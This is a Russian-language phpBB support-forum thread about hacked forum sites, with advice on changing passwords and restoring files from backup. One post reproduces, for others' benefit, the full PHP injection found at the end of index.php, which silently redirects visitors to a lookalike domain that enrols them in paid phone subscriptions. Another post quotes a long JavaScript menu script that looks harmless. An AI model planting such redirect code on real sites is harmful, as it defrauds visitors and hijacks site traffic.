Как убить Трояна?

AdmninsCluba · Сообщение **AdmninsCluba** » 12.05.2007 16:23

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html

lucifer · Сообщение **lucifer** » 08.03.2012 16:20

FEAR93 · Сообщение **FEAR93** » 08.03.2012 16:25

lucifer писал(а):Я не устанавливал.

А кто устанавливал?
Хостинг бесплатный?

lucifer · Сообщение **lucifer** » 09.03.2012 15:31

lucifer · Сообщение **lucifer** » 15.03.2012 22:06

15.03.2012 22:13

lucifer ты самый первый такой вопрос задал в этой теме! Щас погоди с духом соберёмся и всё тебе подробно расскажем, так сказать раскроем тему чтобы потом люди не спрашивали одно и тоже, а читали наш ответ тебе на твой эксклюзивно хороший вопрос!

lucifer · Сообщение **lucifer** » 15.03.2012 22:29

15.03.2012 22:46

lucifer писал(а):какие пароли нужно менять

А как на твой хостинг можно проникнуть?
Посредством ftp, ssh, либо же со стороны дырки у хостера, так?
Про возможную дырку в phpbb скромно промолчим, ибо известных уязвимостей в скрипте нет. Как его только не курочили (читай модифицировали), пока тьфу тьфу тьфу... ~~Дай голову, надо по дереву постучать.~~
Ну и что ты можешь закрыть из огромного количества вариантов возможного проникновения к тебе заразы?
ftp и ssh ты должен был поменять пароли сразу, сменить пасы в админки сайтов, сменить пасы тем людям кто имеет туда доступ. Сменить пасы от учетки на хостинге, поменять пассы к БД, пользователей, ну желательно сменить префиксы. Всё это, и даже больше ты узнал бы прочтя пять страниц темы(поттом тебе бы стало лень читать одни и те же советы), но ты бы знал что делать. Нет, ты ещё один который спросил...
Спроси у Поиск Google: взломали FTP Поиск Google: взломали cайт
Информации очень мало конечно, но что то почерпнуть можно. Если останутся вопросы, и гугл будет бессилен, приходи спрашивай. Вместе прочтём тему, найдём ответ.

igorsite · Сообщение **igorsite** » 03.05.2012 13:49

Поймал нового трояна, он заменяет стандартные страницы форума вида: http://мой-сайт.ру/index.php (а также другие страницы темы, сообщения) на *securlty-google.4pu.com/index.php (а также другие страницы форума). При этом пользователь не замечает, что находится уже на другом сайте. В течении какого-то времени появляется всплывающее окно (скриншот прилагаю, обратите внимание на адрес сайта в строке браузера).

Система просит ввести номер телефона, как я проверил при вводе номера происходит подписка на какую-то рассылку с ежедневной стоимостью от 5 до 20 рублей.

Троян находится в файле index.php в корне форума в конце кода.

код трояна

Код: Выделить всё

?><?php
    
    $rSite = 'securlty-google.4pu.com';

    #------------------
    
    
    if(!isset($_SERVER['REQUEST_URI']))
        $_SERVER['REQUEST_URI'] = '';    
    
    $redirectURL = 'http://'.$rSite.$_SERVER['REQUEST_URI'];

    if(isset($_SERVER['HTTP_REFERER']) && !isset($_COOKIE['arx_tt']))        
        if(!preg_match("|^http://$rSite|i",$_SERVER['HTTP_REFERER'])){
     setcookie('arx_tt','1',time()+4*3600,'/');
     exit( '<script>document.location.href = "'.$redirectURL.'";</script>');
 }

    setcookie('arx_tt','1',time()+4*3600,'/');
    


 
?>

надеюсь кому-нибудь это поможет пофиксить баг.

Пчелкин · Сообщение **Пчелкин** » 03.05.2012 14:00

Это не в ФОРУМЕ ВИРУС..ЭТ В КОМПЕ у тебя вирус был...а туда перепрыгнул...перепрыгнет и еще раз...

igorsite · Сообщение **igorsite** » 03.05.2012 14:13

у меня на работе лицензионный касперский, дома лицензионный касперский. плюсом еще spyware terminator стоит. Все дырявые что-ли? какой же антивирусник поставить, чтобы уберечься от этой холеры...

Сообщение **Sheer** » 03.05.2012 14:27

igorsite писал(а):какой же антивирусник поставить

Avast

МайскийЖук · 03.05.2012 14:31

Ага. ClamWin еще лучше.

Пчелкин · Сообщение **Пчелкин** » 03.05.2012 14:39

+1 Поддерживаю...Гы...

deadromeo · Сообщение **deadromeo** » 05.06.2012 22:49

Вообщем не пинайте меня сразу в темку о троянах, это совсем другой случай. Жил форум уже достаточно времени на одном шаблоне - X-Static. Но с сегодняшнего дня внезапно антивирус заорал благим матом, через оперу, через Проинспектировать элемент, было установлено что идет циклическая скачка какогото ПДФ файла с левого сервера. Все попытки найти на сервере среди файлов вредоносный скрипт не увенчались успехом. Опытным путем было установлено то, что вредоносный скрипт подключается в оверал_хидере. Данный файл был осмотрен сверху до низу, скрипты вроде как только джиквери и парочка от других модификаций.

Вообщем соль в том, что поочередно удаляя подключение скриптов было установлено невероятное

вредоносный скрипт

Код: Выделить всё

<script type="text/javascript">
// <![CDATA[

var ie4=document.all
var ns6=document.getElementById && !document.all
var defaultwidth=menuwidth
if (ie4||ns6)
document.write('<div id="dropmenudiv" style="visibility:hidden;width:'+menuwidth+';background-color:'+menubgcolor+'" onmouseover="clearhidemenu()" onmouseout="dynamichide(event)"></div>')
function getposOffset(what, offsettype){
var totaloffset=(offsettype=="left")? what.offsetLeft : what.offsetTop;
var parentEl=what.offsetParent;
while (parentEl!=null){
totaloffset=(offsettype=="left")? totaloffset+parentEl.offsetLeft : totaloffset+parentEl.offsetTop;
parentEl=parentEl.offsetParent;
}
return totaloffset;
}
function showhide(obj, e, visible, hidden, menuwidth){
if (ie4||ns6)
dropmenuobj.style.left=dropmenuobj.style.top=-500
dropmenuobj.widthobj=dropmenuobj.style
if (typeof menuwidth=='undefined'||menuwidth=='selfc'){
tmpspan.style.display='inline'
dropmenuobj.widthobj.width=tmpspan.offsetWidth+'px'
tmpspan.style.display='none'
}
else if (menuwidth!='')
dropmenuobj.widthobj.width=menuwidth
else
dropmenuobj.widthobj.width=defaultwidth
if (e.type=="click" && obj.visibility==hidden || e.type=="mouseover")
obj.visibility=visible
else if (e.type=="click")
obj.visibility=hidden
}
function iecompattest(){
return (document.compatMode && document.compatMode!="BackCompat")? document.documentElement : document.body
}
function clearbrowseredge(obj, whichedge){
var edgeoffset=0
if (whichedge=="rightedge"){
var windowedge=ie4 && !window.opera? iecompattest().scrollLeft+iecompattest().clientWidth-15 : window.pageXOffset+window.innerWidth-15
dropmenuobj.contentmeasure=dropmenuobj.offsetWidth
if (windowedge-dropmenuobj.x < dropmenuobj.contentmeasure)
edgeoffset=dropmenuobj.contentmeasure-obj.offsetWidth
}
else{
var topedge=ie4 && !window.opera? iecompattest().scrollTop : window.pageYOffset
var windowedge=ie4 && !window.opera? iecompattest().scrollTop+iecompattest().clientHeight-15 : window.pageYOffset+window.innerHeight-18
dropmenuobj.contentmeasure=dropmenuobj.offsetHeight
if (windowedge-dropmenuobj.y < dropmenuobj.contentmeasure){ //move up?
edgeoffset=dropmenuobj.contentmeasure+obj.offsetHeight
if ((dropmenuobj.y-topedge)<dropmenuobj.contentmeasure) //up no good either?
edgeoffset=dropmenuobj.y+obj.offsetHeight-topedge
}
}
return edgeoffset
}
function populatemenu(what){
if (ie4||ns6){
var appendit=0
if (typeof tmpspan=='undefined'){
tmpspan=document.createElement('span')
appendit=1
}
if(appendit){
tmpspan.style.position="absolute"
tmpspan.style.left="-1000px"
tmpspan.id='tspan'
document.body.appendChild(tmpspan)
tmpspan.style.display='none'
}
tmpspan.innerHTML=dropmenuobj.innerHTML=what.join("")
}
}
function dropdownmenu(obj, e, menucontents, menuwidth){
obj.onmouseout=delayhidemenu;
if (window.event) event.cancelBubble=true
else if (e.stopPropagation) e.stopPropagation()
clearhidemenu()
dropmenuobj=document.getElementById? document.getElementById("dropmenudiv") : dropmenudiv
populatemenu(menucontents)
if (ie4||ns6){
showhide(dropmenuobj.style, e, "visible", "hidden", menuwidth)
dropmenuobj.x=getposOffset(obj, "left")
dropmenuobj.y=getposOffset(obj, "top")
dropmenuobj.style.left=dropmenuobj.x-clearbrowseredge(obj, "rightedge")+"px"
dropmenuobj.style.top=dropmenuobj.y-clearbrowseredge(obj, "bottomedge")+obj.offsetHeight+"px"
}
return clickreturnvalue()
}
function clickreturnvalue(){
if (ie4||ns6) return false
else return true
}
function contains_ns6(a, b) {
while (b.parentNode)
if ((b = b.parentNode) == a)
return true;
return false;
}
function dynamichide(e){
if (ie4&&!dropmenuobj.contains(e.toElement))
delayhidemenu()
else if (ns6&&e.currentTarget!= e.relatedTarget&& !contains_ns6(e.currentTarget, e.relatedTarget))
delayhidemenu()
}
function hidemenu(e){
if (typeof dropmenuobj!="undefined"){
if (ie4||ns6)
dropmenuobj.style.visibility="hidden"
}
}
function delayhidemenu(){
if (ie4||ns6)
delayhide=setTimeout("hidemenu()",disappeardelay)
}
function clearhidemenu(){
if (typeof delayhide!="undefined")
clearTimeout(delayhide)
}
if (hidemenu_onclick=="yes")
document.onclick=hidemenu
// ]]>
</script>

является частью этого стиля, те он был в нем с момента скачки у разработчика. А после удаления этого куска кода антивирус успокаивался. Как такое вообще может быть?

Ах да, почему я всетаки написал все в отдельную тему. Да потому что такой же стиль X-Static использует на своем форуме один из модераторов вашего ресурса. И прежде чем начать тему я решил заглянуть к нему на форум и о чудо - его форум недоступен

ЗЫ. Чудодейственным образом антивирус замолчал после написания этой темы, вредоносный код вдруг не показывает носа

чертовщина

MIT · Сообщение **MIT** » 05.06.2012 23:06

Касперский ругается на файл /tracker/addons/js/jquery-min.js, думаю дело именно в нём. А не в стиле.

phpBB Guru - Официальная русская поддержка форума phpBB